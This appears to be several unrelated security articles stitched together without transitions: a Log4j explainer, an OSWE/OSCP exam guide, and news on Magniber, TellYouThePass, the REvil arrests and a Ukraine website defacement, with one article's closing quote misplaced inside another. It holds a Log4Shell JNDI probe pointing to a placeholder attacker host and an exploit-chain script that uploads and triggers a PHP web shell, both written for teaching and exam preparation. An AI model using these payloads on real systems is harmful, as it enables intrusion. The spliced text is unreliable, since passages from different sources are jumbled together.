Apache Log4J, The Vulnerability That Destroyed The Internet
It’s happened... everybody stay calm. What’s the procedure? December 2021 wasn’t that jolly. A couple of weeks ago, a story broke about a new bug found in a piece of very popular, widely used computer code.
The very next day, every major cloud company was in crisis mode. Google, Amazon, Microsoft, you name them, they panicked. The code in question is Apache Log4j, an open-source logging library commonly used by apps and services across the internet. It affects not only the cloud but also a lot of hardware we use, including TVs, security cameras, and the like.
Imagine that millions of us had the same lock keeping our homes safe, and we just found out there’s a master key that opens them all... Yeah, it’s one great mess for us security specialists and one giant opportunity for hackers.
Generally speaking, Log4j is a piece of code that helps software applications keep track of their past activities: actions, events, and so on. It’s free and open-source, has been available since around 2001, and is widely used in Java applications. Whenever Log4j is asked to record something new, it adds it to the log. This is where the problem lies: if you ask Log4j to log a line of malicious code, it can go on to execute that code.
Apache Log4j is part of the Java ecosystem, and Java has been a foundational part of computing as we know it since the mid-90s. Now that hackers know about this bug, they can exploit it easily and widely. In Minecraft, for example, it’s as easy as typing a line into a public chat box.
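To make the mechanism concrete, here is a minimal sketch of the kind of lookup string attackers were logging; the callback hostname is a placeholder for illustration, not taken from any real attack.

```python
# Illustrative sketch of the classic Log4Shell probe string.
# "attacker.example" is a placeholder host, not a real server.
def jndi_probe(callback_host: str) -> str:
    # When a vulnerable Log4j 2.x (before 2.15.0) logs this string,
    # the ${jndi:...} lookup gets resolved, contacting the attacker's
    # LDAP server and potentially loading remote code.
    return "${jndi:ldap://" + callback_host + "/a}"

print(jndi_probe("attacker.example"))  # -> ${jndi:ldap://attacker.example/a}
```

Anywhere this string ends up in a log call, a chat message, a Twitter display name, an HTTP header, the vulnerable logger will try to resolve it.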
That’s not all. Some Twitter users began changing their display names to code strings that could trigger the exploit, and even the Belgian Ministry of Defence admitted that hackers had already exploited the vulnerability and paralyzed some of the government’s activity.
This bug can paralyze apps, networks, devices and countries and it’s already been hailed as the biggest cybersecurity risk of the decade.
Let’s add even more spice into the mix: some say it was Alibaba that found the bug, and China suspended a deal with Alibaba Cloud for not sharing the problem with the government first. Make of that what you will.
Months earlier, the Chinese government issued new regulations demanding that all networking vendors report critical flaws to the government first. Alibaba Cloud apologized and promised to do better in the future, but strangely, the vulnerability has been used by multiple Chinese nation-state activity groups, so some might wonder whether China’s fury is so strong because it couldn’t exploit the bug before it became public.
As of the time of writing, the latest, safest version of Apache Log4j is 2.17.1.
The bugs, the devices, China: everything sounds scary, right? Companies are trying their hardest to react properly. Reportedly, at Google alone, more than 500 engineers are going through the code, but according to many reports, patching the problems isn’t going that well.
Apache has issued several patches, but with each one, additional problems have cropped up. The Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner that helps identify vulnerable applications. There are thousands of people working on this day and night.
Industry experts say it could take years for this problem to be fully fixed, but there are a couple of things you can do to stay safe: avoid phishing emails (no one is giving out millions of dollars through a strange link), and make sure your apps are updated to the latest versions.
Developers are always trying their hardest to fix newly discovered vulnerabilities, so it’s crucial to update as soon as an update is available. As we all know, some applications and repositories have been patched, and many have not.
Compared to the OSWE, the OSCP is a beginner-friendly course that focuses on breadth of knowledge rather than depth, while the OSWE is more specialized and advanced.
With OSCP, the goal was to find a vulnerable service, look for a public exploit of that service, tweak the exploit a bit, and repeat until you got root. The process involved a lot of Google searches for public exploits of the discovered service versions. With OSWE, the goal was to discover the vulnerable functionality with the help of the source code, build an exploit based on how the source code processes the input, and script the entire exploit chain to gain a reverse shell.
Since I have an extensive background in software development and have played tons of CTFs with source-code-review-based challenges, I found the OSWE easier than the OSCP, though I believe the general opinion is otherwise. This may be because the OSCP was my first certification, and I did not have enough exposure to HackTheBox and similar platforms before starting that course, while with the OSWE, I had quite a bit of relevant experience.
However, in terms of knowledge and things I took back home, I would give OSWE the points here, as the skills gained were more practical and much more applicable in a real-world scenario compared to what I learned in OSCP.
Is OSWE easier than OSCP?
OSWE is an “expert” level certificate. If you compare it to HTB boxes, it will definitely be around Hard/Insane difficulty, while OSCP/PWK would be around Easy/Medium difficulty.
Do I need OSCP for OSWE?
It is not required to have the OSCP certification in order to attempt the OSWE. However, it is recommended to go for the OSCP first, as it would inevitably give you a strong base for your pentest skills. Think of the OSWE as a specialization in Web Applications.
Cracking The OSWE Exam Guide
Ever since I completed the OSCP, I feared I’d miss the thrill of Offsec certifications, which is why I decided that the OSWE would be a good course to re-live the thrill of learning and trying harder all over again!
Now that I’ve completed the OSWE Certification in the first exam attempt, I decided to write a semi-technical guide for the AWAE Course by Offensive Security. Thus, in this blog, I’ll be going over the certification, my approach, and some tips that hopefully help you in cracking the OSWE Exam!
P.S. Some parts of this blog may be vague, so as not to disclose excessive details about the course.
Introduction
What is the OSWE certification?
As per Offensive Security, the OSWE Certification (AWAE Course) is described as:
Advanced Web Attacks and Exploitation (WEB-300) is an advanced web application security review course. We teach the skills needed to conduct white box web app penetration tests.
On earning the certification, you would have a clear and practical understanding of white box web application assessment and security. You’d have proven your ability to review advanced source code in web apps, identify vulnerabilities, and exploit them. You would also be able to assist web development teams in creating and maintaining web apps that are secure by design.
How is the course structured?
Back when I registered for the course in Sept ’21, it was offered at $1,299 with 60 days of lab time, and $1,499 with 90 days of lab time. I opted for the 60-day version, which I believe is ideal for those who work or study full-time. Offensive Security has since launched a subscription-based model; more information on that can be found on their site.
Just like any other Offensive Security course, I was given a Course Manual, and accompanying video lessons as the preparation material for the course. The material was really important, as it allowed me to build a methodology to tackle the exam labs, taught many new and creative attack vectors, and highlighted the importance of debugging & logging.
I was also given access to a lab environment that had 2 types of labs:
Guided Labs: These were pre-existing Open Source Software that already had valid vulnerabilities disclosed, and the discovery of these vulnerabilities was in-line with the aim of the course. These applications were carefully selected to cover a wide variety of development frameworks, programming languages, and unique vulnerabilities. The solution, methodology, and alternate pathways were all provided to us in the material.
Un-Guided Labs: These were custom labs created by Offensive Security to give us a better idea of how the exam labs would be structured. This was a key part of evaluating my progress and readiness for the exam. These machines were slightly smaller in scale compared to the guided labs, however, similar in difficulty.
These labs were fairly doable in the 60 days timeframe considering that I had a full-time job on the side. However, now with the new subscription model, I believe time would not be an issue.
What are the pre-requisites?
Offensive Security doesn’t impose any mandatory pre-requisites for this course. However, from a technical standpoint, the course will be much more manageable if you have prior experience in programming (specifically with an MVC-based web framework), scripting, and web security concepts.
If you’re new to Web Development, it would take you additional time to understand the architecture of a web application, and it may be overwhelming to do so during the course due to the wide range of programming languages and frameworks that are covered. Thus, before starting the course, I would recommend you to take up a small project of building a Full-Stack Web Application using an MVC Framework. Some examples of such frameworks are mentioned below:
Django – Based on Python
NodeJS (MERN/MEAN Stack) – Based on JavaScript
Spring – Based on Java
CakePHP – Based on PHP
ASP.NET – Based on C#
Scripting-wise, from the perspective of this course, you should be able to mimic GET/POST/WebSocket requests and workflows right from your script. The aim of the course is not only to discover vulnerabilities but also to automate the entire exploitation process (from authentication bypass to RCE) with a single script that requires no manual interaction. A few important Python libraries that you’ll be using throughout the course:
requests – To initiate GET/POST requests, and set sessions to incorporate complex workflows (For example: Authenticate, upload a file, and visit the uploaded file)
websocket – To mimic WebSocket connections.
(Optional) multiprocessing – I used this library to thread scripts that involved any sort of brute force; this helped me save about 90% time in testing scripts that would otherwise take 20-30 minutes to complete.
sys/os/subprocess – To execute System/OS level commands, and potentially capture their output, if required.
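As a rough sketch of the time savings threading buys you, here is a boolean-blind extraction loop run against a simulated oracle. The secret string and the oracle function are made up for illustration; in a real script, the oracle would fire one `requests` call per guess and inspect the response.

```python
import string
from multiprocessing.dummy import Pool  # thread-based pool from multiprocessing

SECRET = "s3cr3t"  # stands in for the data a blind injection would leak

def oracle(position: int, candidate: str) -> bool:
    # In a real exploit this would send a crafted request (e.g. via requests)
    # and return True/False based on the response time or content.
    return position < len(SECRET) and SECRET[position] == candidate

def extract_char(position: int) -> str:
    # One guess per candidate character, just like a boolean-blind payload.
    for c in string.ascii_lowercase + string.digits:
        if oracle(position, c):
            return c
    return ""

def extract(length: int) -> str:
    # Each position is independent, so the per-position loops run in parallel.
    with Pool(8) as pool:
        return "".join(pool.map(extract_char, range(length)))

print(extract(6))  # -> s3cr3t
```

Against a live target, each oracle call costs a network round-trip, which is why parallelizing the positions cuts a 20-30 minute run down so dramatically.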
Is OSWE the next milestone for me?
If you’re a Cyber Security Professional looking to get a jump start into White Box Assessments of Web Applications; or if you’re a Software Engineer looking to expand your horizon on Web Security, this course is for you!
Since this is a fairly new course, its industry-wide recognition doesn’t match that of the OSCP. I’ve seen many job descriptions mention the OSWE as an optional requirement, but never as a mandatory one. However, the presence of this badge on your profile will make a good impression on a technical recruiter, since this is an advanced-level course; it just may not always be the “wow” factor.
For Software Engineers, this certification would be a very unique add-on, and recruiters would appreciate and acknowledge your ability to write secure code.
I signed up for the course solely for the learning (and also the thrill!).
Preparation Timeline
I began the 60 days of lab access on 12th September and spent the first day reading the introductory portion of the course manual. I jumped right into the labs the following day as the introductory material was straightforward, and mostly comprised of topics that security professionals are generally aware of.
On weekdays, I spent around 4-5 hours on the labs, and on weekends, around 6-7 hours. This pace was enough for me to complete the guided labs, their extra miles, and my notes by 9th October. I then had to pause my preparation until 18th October, as I got sick. The timing couldn’t have been any worse, right? Luckily, I had enough time remaining for the un-guided labs, so I decided to rest well before getting back to work!
After a short, but seemingly long break, I was back at it, and completed the un-guided labs on 23rd October. I registered for my exam for 29th October as I estimated that I would be done with the revision, notes refining, and a little rest by then. I booked the date quite close to when I completed the course, as I was told that the un-guided labs are very close to what the actual exam format is, thus, having completed those labs, I was ready for the exam.
The Exam
You’re given 48 hours to complete the machines given in the exam, and an additional 24 hours to complete the report where you describe your methodology, exploit, PoC script (that replicates the entire exploit chain), and screenshots to prove that you actually pwned the machines!
I booked my exam for 10 AM, as I was accustomed to waking up at around 9:15 AM. Ideally, get a good night’s sleep and schedule the exam at a time when you can wake up without an alarm. Some people prefer starting the exam late at night due to the peace and quiet in and around their household; however, I had headphones on at all times, so that wasn’t a requirement for me.
Before the exam, you need to make sure you have these ready:
HD Webcam
ID Proof
Scanned Copy of the ID
The proctored session requires you to provide an ID proof via the webcam, which is why a good quality webcam is required. In my case, the ID wasn’t clearly visible on the webcam, so I had to show a scanned copy of the ID via my shared screen. The verification process starts 15 minutes prior to the exam start, so keep everything ready well in advance!
During the exam, be sure to take breaks whenever you’re stuck, and sleep if required. Don’t hesitate to take a break just because you feel you’ve already taken many. I took a break roughly every two hours to freshen up and get a small bite to eat. That helped me come back with a fresh perspective, allowing me to question my own thinking. This is really important, because sometimes you keep re-iterating the same thought and never question how you came to a conclusion.
I had faced something similar during the exam: I was going over the source code for one of the machines, and I had skipped over the actually vulnerable function twice just because I thought “nah, that wouldn’t be it“. The third time, just after I had gotten back from a short break, I questioned my assumption instantly and got through!
Also, don’t forget to take a screenshot of every step you take once you’ve found the intended exploit chain. Once you have all the screenshots, and code snippets all compiled, you can use the additional 24 hours provided to format your report with the information you’ve jotted down during the exam. I kept updating a rough version of the report during the exam itself and kept the formatting for later.
I submitted the last flag with 15 hours left on the clock; that’s when I took a nice, long break before getting into reporting mode. The report took around 10 hours in total, and I submitted it an hour after my exam ended. Paranoia kept forcing me to re-read the 50-page report until I couldn’t bear reading it anymore.
In total, I slept for around 9 hours during the exam and managed to submit the final report in 49 hours from the exam start. The machines in the exam were similar to the labs, and covering all of the material in the course manual should be more than enough to be ready for the exam. All that remains is that you have a clear head, a good night’s sleep, and some patience to read through a lot of code!
Note Taking
Shifting gears to how I cleared the OSWE exam from a technical standpoint, a good place to start is my note-taking process.
I used Obsidian as my notes app. This was my first time using the app, but I really loved the way it linked different aspects of my notes together. It is also equipped with powerful search functionality, which is why I would definitely recommend it as your primary notes app.
It is also important to keep a backup of your notes, and I used git for this purpose. Every few days, I’d just push the updated notes onto GitHub to have a backup, and a way to go back to old versions, if required.
How did I structure my Notes?
I divided my notes into the following sections:
Images – Just a folder for all the screenshots that I pasted into Obsidian.
Labs – Where I stored my methodology, extra-miles, and scripts for each of the labs.
I used the following file name syntax for naming the notes for each of the labs: <ProgrammingLanguage> (<ExploitChain: SQL Injection to Deserialization to RCE>) <MachineName> - <IPAddress>. This allowed me to quickly get a glance at the type of vulnerabilities covered for each programming language during the exam. This helps in prioritizing what vulnerabilities you should look for when you attack a target. This does not necessarily reduce the sample space, because there is no guarantee that the exploit chain for the programming language would be similar to what you’ve done in the labs, but it’s always a good place to start!
For each Lab, my notes contained the following sections:
A section to highlight what I tried, and why that failed/passed – this helped me during the revision phase where I could sort of re-live my methodology without actually having to do the labs.
The final steps – spoon-fed so that they can be replicated, if required in the exam.
The final scripts – when I wasn’t too lazy to actually code one.
A references section – to highlight anything new that I read to complete that machine. The individual links were directly linked to a particular section in the notes. I had this section to go over during the revision phase, and as expected, it wasn’t useful during the exam.
A Keywords section – this was solely for the search functionality in Obsidian; I used hashtags to highlight important aspects covered in the lab. The idea was that if I got stuck on a particular exploit chain during the exam, I would have a place to refer to. However, I did not end up using this during my exam.
Scripts – These were a compilation of common scripts that I felt could be re-used (SQL Injection – Time & Boolean Based Blind – both threaded & non-threaded versions; File Upload, etc.). This helped me greatly during the exam, as I did not have to spend extra time scripting common exploits that I already covered in the labs. I re-used the code and modified it as required.
Debugging & Logging – As the name suggests, I used this section to note the steps to set up debugging on different frameworks and to enable logging on databases for inspecting queries. This was mostly redundant, as we are provided with a debugging machine that is pre-configured to debug the labs without any additional configuration. But it is a good section to have and may be useful if things don’t go as expected. To save some effort, there’s a certain post on the Offsec Forum where someone took the effort to list the steps to set up debugging on every framework. It’s hard to miss that post.
Nudges – This was my most visited section during the exam. Here, I noted down the following:
All the possible things I may want to check for each language/web framework. It covered important function calls, object initializations, or general keywords that would possibly indicate the presence of a vulnerability.
For Instance: readObject & ObjectInputStream – Deserialization (<Reference to a lab that covers this>).
The areas that I got stuck at in the labs, or what I did wrong (in a given context).
A summary of the methodology for each step of the exploit chain. This contained the possible vulnerabilities/pathways I need to look for at each step of the way (Authentication Bypass, Privilege Elevation, and RCE).
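As a rough illustration of how such a keyword list gets used, a few lines of Python can sweep source code for sink patterns before you read anything in depth. The patterns and the sample snippet below are an illustrative subset I made up, not taken from the course material:

```python
import re

# Map of "dangerous sink" regexes to the vulnerability class they hint at.
# Illustrative subset only; a real list would be per-language and much longer.
SINKS = {
    r"ObjectInputStream|readObject": "Java deserialization",
    r"\beval\s*\(": "code injection",
    r"unserialize\s*\(": "PHP deserialization",
}

def scan(source):
    """Return a flat list of 'line N: possible <vuln>' hits."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern, vuln in SINKS.items():
            if re.search(pattern, line):
                hits.append(f"line {lineno}: possible {vuln}")
    return hits

sample = """\
ObjectInputStream in = new ObjectInputStream(request.getInputStream());
Object obj = in.readObject();
"""
for hit in scan(sample):
    print(hit)
```

A hit is only a nudge toward where to focus; you still have to trace whether attacker-controlled input actually reaches the sink.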
These sections were more than enough for me to revise, and refer to during the exam. I did not feel that anything was missing from the notes, and found the Nudges & Scripts sections the most helpful, as I mostly only opened my notes when I was stuck during the exam to make sure that I didn’t skip over any steps during my initial reconnaissance and discovery phases.
My Methodology?
The course covered a wide variety of vulnerabilities from the OWASP Top 10 list, and in various web frameworks. We also went over various logical vulnerabilities that required creative exploit vectors, and were fun to discover!
Even though most of the vulnerabilities present in the labs/exam are conventional OWASP Top 10 based, the discovery phase is not that straightforward for them. In the next few bullet points, I’ll briefly go over my methodology, keeping in mind that I can’t disclose too much about the same. I will keep it simple because as you progress through the labs, you will start to develop a methodology of your own, and you won’t end up needing assistance! And this methodology can be carried over to actual White Box Assessments!
Read the source of the application to locate the unauthenticated endpoints. The location of endpoints, and whether they require authentication is variable for each development framework, thus, this is something that would come with practice. Endpoints can also be enumerated via fuzzing the web application, however, this won’t be as thorough (and effective) as exploring the available routes from the source.
Enable logging/debugging to figure out where the vulnerability is. Explore the logic behind the entire authentication flow (Register, Login, etc.), and think of creative attack vectors that could possibly bypass the logic. This goes hand in hand with fuzzing the available input fields to populate the logs being captured for analysis.
Once you discover the vulnerable location, you will have to go through the source code to figure out any sanitization, blacklisting, or whitelisting that takes place. Debugging sometimes reduces the complexity of this task, as you can track where your input goes and how it gets modified on its way to finally being processed, rendered, or stored. This helps you build an exploit for the discovered vulnerability.
As you move from the authentication bypass to the other stages of the machine, the scope of testing expands, with new authenticated endpoints added to the mix. Evaluate these endpoints from the perspective of escalating privileges or gaining RCE.
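Pulled together, the single-script automation the course expects tends to follow the same skeleton. The endpoints below (`/login`, `/upload`, `/uploads/...`) and credentials are placeholders I made up, not from any lab:

```python
def run_chain(base_url, session=None):
    """Hypothetical single-script chain: authenticate, upload, trigger.

    `session` is injectable so the flow can be dry-run without a live
    target; by default it uses requests.Session, whose cookie jar
    carries the authenticated state across all three steps.
    """
    if session is None:
        import requests  # third-party; only needed for a live run
        session = requests.Session()
    # Step 1: authentication bypass / login (placeholder credentials).
    session.post(f"{base_url}/login", data={"user": "admin", "pass": "guess"})
    # Step 2: abuse an authenticated endpoint, e.g. a file upload.
    session.post(f"{base_url}/upload",
                 files={"file": ("shell.php", b"<?php system($_GET['c']); ?>")})
    # Step 3: trigger the uploaded payload for RCE.
    return session.get(f"{base_url}/uploads/shell.php?c=id")
```

Structuring the chain as one function with an injectable session also makes it easy to re-run end to end after every tweak, which is exactly what the exam grading expects of your PoC.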
What if I’m stuck?
Look back at your notes, go over your methodology to see if you missed anything. A good way to make sure you covered everything is to make a list of authenticated/unauthenticated endpoints, and write down what you concluded about each of the endpoints.
Go over the vulnerable keywords for the language that the application is coded in, from your notes.
Go over the source again, but this time with a fresh mind. Start your methodology from scratch, because in your first iteration, you may have missed the most obvious things!
Apply a Black Box testing methodology, and explore logs to see if anything’s out of the ordinary. Debug the application to validate the application flow. There may be times when the main logic for a route is not in the controllers, but in a middleware.
Found the vulnerability, but unable to exploit it? Look for common payload-based bypasses on the interwebs; sometimes you may get lucky. This is not ideal, though, as you won’t be able to dissect why your payload/exploit isn’t working. If nothing works, stick to the basics: use debugging to figure out what’s happening to your payload and why it behaves the way it does.
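A toy example of that last point: a single-pass blacklist can look safe in black-box testing, but reading (or stepping through) the sanitizer shows exactly why a nested payload survives. The filter below is hypothetical, not from any lab:

```python
import re

def naive_sanitize(value: str) -> str:
    # Strips <script> tags, but in a single, non-recursive pass -
    # the classic flaw this kind of white-box review uncovers.
    return re.sub(r"<script>", "", value, flags=re.IGNORECASE)

# The direct payload is neutralized...
print(naive_sanitize("<script>alert(1)</script>"))   # -> alert(1)</script>
# ...but a nested tag re-assembles once the inner match is removed:
print(naive_sanitize("<scr<script>ipt>alert(1)</script>"))  # -> <script>alert(1)</script>
```

Tracing the input through the sanitizer, rather than guessing payloads, is what turns "my exploit doesn’t work" into a concrete bypass.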
What could have been better?
Although this course was really informative and well structured, I believe some aspects of it could have been slightly better. These are minor concerns that would not affect your preparation in any way, but addressing them would have made things slightly smoother overall.
The debugging machines given to us during the exam were barely usable. With a two-second delay on every action, debugging became very cumbersome and made the entire experience prone to misclicks, ending up in issues that warranted a machine reset. I eventually got used to the delay, but I did waste quite a bit of time while debugging in general.
The support team had different responses to technical queries relating to my VPN connection. This ambiguity almost cost me my exam attempt. Luckily the issues were resolved on my end, otherwise, I was sure that this would have eaten up a major chunk of my exam time.
Regardless of these minor issues, which I’m sure will fade away as the course matures, the overall experience of the labs and the exam was very positive. The proctors were super friendly and responded instantly to any query that I had.
Resources I referred to?
hxtps://github.com/carlospolop/hacktricks/tree/master/pentesting-web – My go-to guide for vulnerability discovery methodology.
hxtps://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/ – For practicing the type of vulnerabilities. This can be used as a preparation resource before signing up for the course.
hxtps://github.com/wetw0rk/AWAE-PREP
Final Thoughts (Extended)
OSCP
In general, the OSCP exam is well known for its difficulty, and it’s not the exam systems but rather the 24-hour time limit that makes it challenging. Between the continuous enumeration and exploitation of machines and the constant debugging of issues, fatigue quickly builds up, causing one’s concentration and efficiency to suffer; this eventually leads to more problems later on. To break this cycle, the best advice I can give is to have a thorough plan, so you’ll always know what to do next, how much time you are willing to sink into a single problem, and what you need to document for compromising a host. The exam machines themselves were up-to-date systems, so you couldn’t take the easy kernel-exploit path available on some of the lab machines. Difficulty-wise, I found the exam machines more difficult than the ones in the lab, but not by much. In the end, I managed to complete all the objectives and gain administrative shell access on all target machines. My final exam report was 38 pages long, and the lab report I submitted had 122 pages.
OSWE
Even with its current shortcomings, I can safely recommend the AWAE/OSWE course. If you are willing to sink in the time, then anything the course explains in depth, it explains exceptionally well. It introduces techniques and exploit chains that open up new ways to look at vulnerabilities and leave that ticking in the back of your head, asking how something could be used later on in unexpected ways. As for the problems I have with the course, I hope future updates will address them. Until then, there are other courses available that nicely complement the AWAE course, albeit at a somewhat steeper price. Consider this course the start of a journey rather than the final goal.
A few closing words for people who are thinking about getting OSCP certified. While Offsec advertises its course as not beginner-friendly, I have to disagree. I think this certification is most valuable for people who want to break into InfoSec, like CS students or IT personnel at the beginning of their NetSec career, rather than seasoned pentesters. Definitely don’t allow yourselves to become disheartened by the fame the OSCP has; dive into the deep end. At the end of the day, the course is a test of discipline and determination above all else.
The Magniber ransomware has been spotted using Windows application package files (.APPX) signed with valid certificates to drop malware pretending to be Chrome and Edge web browser updates.
This distribution method marks a shift from previous approaches seen with this threat actor, which typically relies on exploiting Internet Explorer vulnerabilities.
Browser update notification
The infection begins by visiting a payload dropping website, researchers at Korea cybersecurity company AhnLab note in a report published today.
How victims get to the website remains unclear. The lure could be delivered via phishing emails, links sent through IMs on social media, or other distribution methods.
Two of the URLs distributing the payload are “hxxp://b5305c364336bqd.bytesoh.cam”, and “hxxp://hadhill.quest/376s53290a9n2j”, but these may not be the only ones.
Visitors to these sites receive an alert to update their Edge/Chrome browser manually, and are offered an APPX file to complete the action.
APPX files are Windows application package files created for streamlined distribution and installation and have been abused by various threats in the past for malware distribution.
In the case of Magniber ransomware, the disguised APPX file is digitally signed with a valid certificate, so Windows sees them as trusted files that do not trigger a warning.
The threat actor’s choice to use APPX files is most likely driven by the need to reach a wider audience since the market share for Internet Explorer is dwindling into extinction.
Dropping the payload
Accepting the malicious APPX file results in the creation of two files in the “C:\Program Files\WindowsApps” directory, namely ‘wjoiyyxzllm.exe’ and ‘wjoiyyxzllm.dll’.
These files execute a function that fetches the Magniber ransomware payload, decodes it, and then executes it.
After encrypting the data on the system, the threat creates the following ransom note:
Although the note is in English, it is worth noting that Magniber ransomware targets Asian users exclusively these days.
At the moment there is no possibility to decrypt files locked by this malware free of charge.
Unlike most ransomware operations, Magniber did not adopt the double extortion tactic, so it does not steal files before encrypting the systems.
Backing up the data on a regular basis is a good solution to recover from attacks with low-tier ransomware like Magniber.
TellYouThePass ransomware has re-emerged as a Golang-compiled malware, making it easier to target more operating systems, macOS and Linux in particular.
The return of this malware strain was noticed last month when threat actors used it in conjunction with the Log4Shell exploit to target vulnerable machines.
Now, a report from Crowdstrike sheds more light on this return, focusing on code-level changes that make it easier to compile for other platforms than Windows.
Why Golang?
Golang is a programming language first adopted by malware authors in 2019 due to its cross-platform versatility.
Furthermore, Golang allows linking dependency libraries into a single binary file, which leads to a smaller footprint of command and control (C2) server communications, thus reducing detection rates.
It is also easier to learn than other programming languages, e.g. Python, and features modern debugging and plugin tools that simplify the programming process.
A notable example of a successful malware written in Golang is the Glupteba botnet, which was disrupted last month by Google’s security specialists.
New TellYouThePass samples
Crowdstrike analysts report a code similarity of 85% between the Linux and Windows samples of TellYouThePass, showcasing the minimal adjustments needed to make the ransomware run on different operating systems.
One noteworthy change in the latest samples of the ransomware is the randomization of the names of all functions apart from the ‘main’ one, which attempts to thwart analysis.
Prior to initiating the encryption routine, TellYouThePass kills tasks and services that could interfere with the process or result in incomplete encryption, such as email clients, database apps, web servers, and document editors.
Moreover, some directories are excluded from encryption to avoid rendering the system non-bootable, which would waste any chance of getting paid.
The ransom note dropped in the recent TellYouThePass infections asks for 0.05 Bitcoin, currently converting to about $2,150, in exchange for the decryption tool.
The encryption scheme uses the RSA-2048 and AES-256 algorithms, and there is no free decryptor available.
For the time being, macOS samples have not been spotted.
A senior Biden administration official on Friday said one of the Russian hackers arrested earlier in the day by that country’s security service is responsible for the ransomware attack that temporarily crippled the Colonial Pipeline last year.
“We understand that one of the individuals who was arrested today was responsible for the attack against Colonial Pipeline last spring,” the official told reporters during a conference call, referring to the arrests carried out by Russia’s Federal Security Service of members of the REvil ransomware gang.
TASS, the country’s state news agency, said 14 members of the notorious digital gang had been detained. The FSB claimed that it seized more than 426 million rubles and $600,000 in cash, as well as cryptocurrency wallets, computers and 20 cars.
Last year, a separate Russian hacker group known as DarkSide claimed responsibility for the Colonial attack. The FBI later confirmed the group was behind the incident, which caused panic buying of gasoline along the East Coast.
However, it is possible that the individual — who the official did not name — worked for one organization before leaving for another or worked for both simultaneously.
REvil was responsible for the supply-chain attack on the software firm Kaseya last year — which impacted more than 1,000 businesses and organizations worldwide — and the digital attack on food processing giant JBS. The group shuttered its operations last July, making a brief comeback later before some of their dark web servers were seized by authorities, seemingly wiping out the criminal group.
Friday’s arrests come amid tensions between Washington and Moscow, as Russia has amassed thousands of troops on the Ukrainian border. The U.S. has publicly accused the Kremlin of preparing an invasion of Ukraine and creating a pretext to take such action.
The Biden official, who briefed reporters on condition of anonymity, said the administration believes the activity by Russia’s internal intelligence agency is “not related to what’s happening with Russia and Ukraine,” adding that the White House has been clear it will impose “severe costs” on the Kremlin in coordination with Western allies.
The official noted that following last year’s in-person meeting between President Joe Biden and Russian leader Vladimir Putin, the two countries established an experts group on cybersecurity where administration officials have provided the Kremlin with information about certain cybercriminals operating within its borders and conveyed what actions Washington expects the government to take against them.
“We’re committed to seeing those conducting ransomware attacks against Americans brought to justice,” according to the official, who said the administration was pleased by Friday’s arrests and that expectation is that Russia “would be pursuing legal action within its own system.”
“While we continue to assess the impact with Ukrainians, it seems limited so far, with multiple websites coming back online,” the official told reporters.
Threat actors defaced multiple Ukrainian government websites after talks between Ukrainian, US, and Russian officials hit a dead end this week.
Threat actors have defaced multiple websites of the Ukrainian government on the night between January 13 and January 14. The attacks were launched after talks between Ukrainian, US, and Russian officials hit a dead end on Thursday.
The attackers deleted the content of multiple websites, including the Ukrainian Ministry of Foreign Affairs, Ministry of Education and Science, Ministry of Defense, the State Emergency Service, and the Cabinet of Ministers.
Defaced websites were displaying the following message in Russian, Ukrainian and Polish languages.
“Ukrainian! All your personal data was uploaded to the public network. All data on the computer is destroyed, it is impossible to restore it. All information about you has become public, be afraid and expect the worst. This is for your past, present and future. For Volhynia, for the OUN UPA, for Galicia, for Polissia and for historical lands.” reads a translation of the message.
The Ukrainian government is investigating the attack; intelligence experts speculate the offensive was launched by Russia-linked actors, but the government has yet to officially attribute the attacks to any nation-state actor.
According to journalist Kim Zetter, attackers apparently exploited a vulnerability in the October CMS tracked as CVE-2021-32648, a finding later confirmed by the national CERT.
“On the night of January 13-14, a number of government websites, including the Ministry of Foreign Affairs, the Ministry of Education and Science and others, were hacked. Provocative messages were posted on the main page of these sites. The content of the sites was not changed and the leakage of personal data, according to preliminary information, did not occur.” reads the advisory published by CERT-UA “According to the results of processing possible attack vectors, the use of the October CMS vulnerability by attackers is not excluded:”
Ukrainian CERT states personal data was not stolen by attackers.
The CERT-UA provided recommendations on how to recover the compromised websites.
The Russian government said today it arrested 14 people accused of working for “REvil,” a particularly aggressive ransomware group that has extorted hundreds of millions of dollars from victim organizations.
The Russian Federal Security Service (FSB) said the actions were taken in response to a request from U.S. officials, but many experts believe the crackdown is part of an effort to reduce tensions over Russian President Vladimir Putin’s decision to station 100,000 troops along the nation’s border with Ukraine.
The FSB said it arrested 14 REvil ransomware members, and searched more than two dozen addresses in Moscow, St. Petersburg, Leningrad and Lipetsk. As part of the raids, the FSB seized more than US $600,000 in cash, 426 million rubles (about $5.5 million), 500,000 euros, and 20 “premium cars” purchased with funds obtained from cybercrime.
“The search activities were based on the appeal of the US authorities, who reported on the leader of the criminal community and his involvement in encroaching on the information resources of foreign high-tech companies by introducing malicious software, encrypting information and extorting money for its decryption,” the FSB said. “Representatives of the US competent authorities have been informed about the results of the operation.”
The FSB did not release the names of any of the individuals arrested, although a report from the Russian news agency TASS mentions two defendants: Roman Gennadyevich Muromsky and Andrey Sergeevich Bessonov. Russian media outlet RIA Novosti released video footage from some of the raids.
REvil is widely thought to be a reincarnation of GandCrab, a Russian-language ransomware affiliate program that bragged of stealing more than $2 billion when it closed up shop in the summer of 2019. For roughly the next two years, REvil’s “Happy Blog” would churn out press releases naming and shaming dozens of new victims each week. A February 2021 analysis from researchers at IBM found the REvil gang earned more than $120 million in 2020 alone.
But all that changed last summer, when REvil associates working with another ransomware group — DarkSide — attacked Colonial Pipeline, causing fuel shortages and price spikes across the United States. Just months later, a multi-country law enforcement operation allowed investigators to hack into the REvil gang’s operations and force the group offline.
In November 2021, Europol announced it had arrested seven REvil affiliates who collectively made more than $230 million worth of ransom demands since 2019. At the same time, U.S. authorities unsealed two indictments against a pair of accused REvil cybercriminals, which referred to the men as “REvil Affiliate #22” and “REvil Affiliate #23.”
It is clear that U.S. authorities have known for some time the real names of REvil’s top captains and moneymakers. Last fall, President Biden told Putin that he expects Russia to act when the United States shares information on specific Russians involved in ransomware activity.
So why now? Russia has amassed approximately 100,000 troops along its southern border with Ukraine, and diplomatic efforts to defuse the situation have reportedly broken down. The Washington Post and other media outlets today report that the Biden administration has accused Moscow of sending saboteurs into Eastern Ukraine to stage an incident that could give Putin a pretext for ordering an invasion.
“The most interesting thing about these arrests is the timing,” said Kevin Breen, director of threat research at Immersive Labs. “For years, Russian Government policy on cybercriminals has been less than proactive to say the least. With Russia and the US currently at the diplomatic table, these arrests are likely part of a far wider, multi-layered, political negotiation.”
